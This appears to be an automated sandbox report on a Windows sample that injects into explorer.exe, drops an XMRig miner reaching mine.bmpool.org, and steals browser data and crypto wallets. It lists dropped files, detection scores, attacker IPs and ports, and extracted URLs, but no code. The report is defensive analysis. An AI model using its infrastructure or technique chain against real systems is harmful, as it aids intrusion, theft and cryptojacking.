                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 553228 Sample: 982d4ea5fee5b8e551d40cb0727... Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 87 Sigma detected: Xmrig 2->87 89 Found malware configuration 2->89 91 Malicious sample detected (through community Yara rule) 2->91 93 12 other signatures 2->93 13 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe 2->13         started        16 services64.exe 2->16         started        process3 signatures4 143 Writes to foreign memory regions 13->143 145 Allocates memory in foreign processes 13->145 147 Injects a PE file into a foreign processes 13->147 18 AppLaunch.exe 15 8 13->18         started        149 Antivirus detection for dropped file 16->149 151 Multi AV Scanner detection for dropped file 16->151 153 Creates a thread in another existing process (thread injection) 16->153 23 conhost.exe 6 16->23         started        process5 dnsIp6 81 95.143.179.185, 31334, 49775 RHTEC-ASrh-tecIPBackboneDE Russian Federation 18->81 83 45.82.70.152, 49778, 49779, 7777 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Netherlands 18->83 69 C:\Users\user\AppData\Local\Temp\sistem.exe, PE32 18->69 dropped 71 C:\Users\user\AppData\Local\...\Microsoft.exe, PE32+ 18->71 dropped 95 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 18->95 97 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->97 99 Tries to harvest and steal browser information (history, passwords, etc) 18->99 101 Tries to steal Crypto Currency Wallets 18->101 25 Microsoft.exe 18->25         started        28 sistem.exe 18->28         started        73 C:\Users\user\AppData\...\sihost64.exe, PE32+ 23->73 dropped 75 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 23->75 dropped 103 Injects code into the Windows Explorer (explorer.exe) 23->103 105 Writes to foreign memory regions 23->105 107 Modifies the context of a thread in another process (thread injection) 23->107 109 2 other signatures 23->109 30 sihost64.exe 23->30         started        32 explorer.exe 23->32         started        file7 signatures8 process9 dnsIp10 119 Antivirus detection for dropped file 25->119 121 Multi AV Scanner detection for dropped file 25->121 123 Writes to foreign memory regions 25->123 35 conhost.exe 4 25->35         started        125 Machine Learning detection for dropped file 28->125 127 Allocates memory in foreign processes 28->127 129 Injects a PE file into a foreign processes 28->129 38 AppLaunch.exe 2 28->38         started        131 Creates a thread in another existing process (thread injection) 30->131 40 conhost.exe 2 30->40         started        79 mine.bmpool.org 32->79 133 System process connects to network (likely due to code injection or exploit) 32->133 135 Query firmware table information (likely to detect VMs) 32->135 signatures11 process12 file13 77 C:\Users\user\AppData\...\services64.exe, PE32+ 35->77 dropped 42 cmd.exe 1 35->42         started        44 cmd.exe 1 35->44         started        process14 signatures15 47 services64.exe 42->47         started        50 conhost.exe 42->50         started        137 Uses schtasks.exe or at.exe to add and modify task schedules 44->137 52 conhost.exe 44->52         started        54 schtasks.exe 1 44->54         started        process16 signatures17 155 Writes to foreign memory regions 47->155 157 Allocates memory in foreign processes 47->157 159 Creates a thread in another existing process (thread injection) 47->159 56 conhost.exe 2 47->56         started        process18 signatures19 111 Injects code into the Windows Explorer (explorer.exe) 56->111 113 Writes to foreign memory regions 56->113 115 Modifies the context of a thread in another process (thread injection) 56->115 117 Injects a PE file into a foreign processes 56->117 59 explorer.exe 56->59         started        63 cmd.exe 1 56->63         started        process20 dnsIp21 85 mine.bmpool.org 157.90.156.89 REDIRISRedIRISAutonomousSystemES United States 59->85 139 System process connects to network (likely due to code injection or exploit) 59->139 141 Query firmware table information (likely to detect VMs) 59->141 65 taskkill.exe 1 63->65         started        67 conhost.exe 63->67         started        signatures22 process23

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe35%VirustotalBrowse
                  982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe100%AviraHEUR/AGEN.1145980
                  C:\Users\user\AppData\Local\Temp\Microsoft.exe100%AviraHEUR/AGEN.1145980
                  C:\Users\user\AppData\Local\Temp\services64.exe100%AviraHEUR/AGEN.1145980
                  C:\Users\user\AppData\Local\Temp\sistem.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Microsoft.exe53%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\services64.exe53%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\sistem.exe31%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\sistem.exe75%ReversingLabsWin32.Infostealer.ClipBanker
                  C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys3%MetadefenderBrowse
                  C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys5%ReversingLabs

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  19.2.services64.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  27.0.explorer.exe.140000000.10.unpack100%AviraHEUR/AGEN.1134782Download File
                  10.0.Microsoft.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  28.0.explorer.exe.140000000.3.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.7.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.8.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.11.unpack100%AviraHEUR/AGEN.1134782Download File
                  19.0.services64.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  27.0.explorer.exe.140000000.6.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.3.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.7.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.12.unpack100%AviraHEUR/AGEN.1134782Download File
                  9.2.AppLaunch.exe.400000.0.unpack100%AviraHEUR/AGEN.1124739Download File
                  8.2.sistem.exe.19a5e8.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  28.2.explorer.exe.140000000.0.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.13.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.13.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.2.unpack100%AviraHEUR/AGEN.1134782Download File
                  15.2.services64.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  28.0.explorer.exe.140000000.5.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.2.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.2.explorer.exe.140000000.0.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.9.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.9.unpack100%AviraHEUR/AGEN.1134782Download File
                  10.2.Microsoft.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  28.0.explorer.exe.140000000.0.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.4.unpack100%AviraHEUR/AGEN.1134782Download File
                  22.0.sihost64.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  27.0.explorer.exe.140000000.1.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.1.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.4.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.5.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.0.unpack100%AviraHEUR/AGEN.1134782Download File
                  15.0.services64.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  28.0.explorer.exe.140000000.6.unpack100%AviraHEUR/AGEN.1134782Download File
                  8.3.sistem.exe.2910000.0.unpack100%AviraHEUR/AGEN.1124739Download File
                  27.0.explorer.exe.140000000.8.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.11.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.10.unpack100%AviraHEUR/AGEN.1134782Download File
                  22.2.sihost64.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  28.0.explorer.exe.140000000.12.unpack100%AviraHEUR/AGEN.1134782Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://service.r0%URL Reputationsafe
                  http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                  http://ns.ado/Identq0%Avira URL Cloudsafe
                  http://tempuri.org/0%URL Reputationsafe
                  http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id90%URL Reputationsafe
                  http://tempuri.org/Entity/Id80%URL Reputationsafe
                  http://tempuri.org/Entity/Id50%URL Reputationsafe
                  http://tempuri.org/Entity/Id40%URL Reputationsafe
                  http://tempuri.org/Entity/Id70%URL Reputationsafe
                  http://tempuri.org/Entity/Id60%URL Reputationsafe
                  http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                  http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                  http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                  http://support.a0%URL Reputationsafe
                  http://iptc.tc4xmp0%URL Reputationsafe
                  http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                  https://api.ip.sb/ip0%URL Reputationsafe
                  http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id200%URL Reputationsafe
                  http://tempuri.org/Entity/Id210%URL Reputationsafe
                  http://tempuri.org/Entity/Id220%URL Reputationsafe
                  http://tempuri.org/Entity/Id230%URL Reputationsafe
                  http://tempuri.org/Entity/Id240%URL Reputationsafe
                  https://xmrig.com/wizard0%URL Reputationsafe
                  http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                  http://forms.rea0%URL Reputationsafe
                  http://tempuri.org/Entity/Id100%URL Reputationsafe
                  https://xmrig.com/benchmark/%s0%URL Reputationsafe
                  http://tempuri.org/Entity/Id110%URL Reputationsafe
                  http://tempuri.org/Entity/Id120%URL Reputationsafe
                  http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id130%URL Reputationsafe
                  http://tempuri.org/Entity/Id140%URL Reputationsafe
                  http://tempuri.org/Entity/Id150%URL Reputationsafe
                  http://tempuri.org/Entity/Id160%URL Reputationsafe
                  http://tempuri.org/Entity/Id170%URL Reputationsafe
                  http://tempuri.org/Entity/Id180%URL Reputationsafe
                  http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id190%URL Reputationsafe
                  http://go.mic4m0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id8Response0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  mine.bmpool.org
                  		157.90.156.89
                  		truefalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/02/sc/sctAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                        		high
                        https://duckduckgo.com/chrome_newtabAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpfalse
                          		high
                          http://service.rAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpfalse
                              		high
                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                		high
                                http://tempuri.org/Entity/Id12ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://ns.ado/IdentqAppLaunch.exe, 00000001.00000002.733909521.0000000005687000.00000004.00000040.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://tempuri.org/AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://tempuri.org/Entity/Id2ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                  		high
                                  http://tempuri.org/Entity/Id21ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                    		high
                                    http://tempuri.org/Entity/Id9AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id8AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id5AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                        		high
                                        http://tempuri.org/Entity/Id4AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://tempuri.org/Entity/Id7AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://tempuri.org/Entity/Id6AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                          		high
                                          https://support.google.com/chrome/?p=plugin_realAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id19ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.interoperabilitybridges.com/wmp-extension-for-chromeAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceAppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://support.google.com/chrome/?p=plugin_pdfAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/faultAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2004/10/wsatAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://tempuri.org/Entity/Id15ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, conhost.exe, 0000000B.00000002.747239669.000001B080001000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://forms.real.com/real/realone/download.html?type=rpsp_usAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://support.aAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://iptc.tc4xmpAppLaunch.exe, 00000001.00000002.733909521.0000000005687000.00000004.00000040.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://tempuri.org/Entity/Id6ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://api.ip.sb/ip982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeAppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://support.google.com/chrome/?p=plugin_quicktimeAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2004/04/scAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://tempuri.org/Entity/Id9ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://tempuri.org/Entity/Id20AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://tempuri.org/Entity/Id21AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://tempuri.org/Entity/Id22AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://tempuri.org/Entity/Id23AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://tempuri.org/Entity/Id24AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://xmrig.com/wizardconhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://tempuri.org/Entity/Id24ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735232254.000000000713C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://tempuri.org/Entity/Id1ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedAppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressingAppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://support.google.com/chrome/?p=plugin_shockwaveAppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://forms.reaAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/trustAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://tempuri.org/Entity/Id10AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
